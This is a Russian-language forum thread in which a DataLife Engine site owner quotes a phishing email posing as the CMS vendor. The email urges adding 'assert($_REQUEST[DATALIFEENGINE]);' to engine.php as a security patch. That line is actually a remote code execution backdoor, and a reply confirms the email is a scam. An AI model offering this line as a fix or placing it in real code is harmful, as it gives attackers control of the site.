Перейти к публикации

[Критично] Ваш сайт под угрозой взлома!


Рекомендованные сообщения

Пришло письмо:

Уважаемые владельцы сайта,

благодарим вас за выбор системы управления сайтом «DataLife Engine».

Уведомляем вас о том, что силами наших специалистов была обнаружена критическая уязвимость во всех версиях «DataLife Engine». При помощи данной уязвимости злоумышленники могут легко получить доступ к панели управления уязвимого сайта. Проблема заключается в недостаточной фильтрации данных. Уязвимость является крупнейшей за все 10 лет разработки «DataLife Engine», примерно 90% сайтов на «Data Life Engine» могут быть взломаны при помощи неё.

К сожалению, ваш сайт входит в число уязвимых сайтов и может быть взломан в любой момент. Просим вас серьёзно отнестись к данной проблеме и устранить уязвимость, следуя инструкции ниже:

Для исправления откройте файл вашего сайта: /engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[DATALIFEENGINE]);

С уважением,

SoftNews Media Group.

Новости у вас нет, как я понимаю таким образом хотят сделать чтобы я оставил дыру на сайте?

Ссылка на сообщение
Поделиться на других сайтах

>> таким образом хотят сделать чтобы я оставил дыру на сайте?

Само собой разумеется, посмотрите откуда рассылка шла, она ведь шла не от bags@dle-news.ru, а с вашего же сайта

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...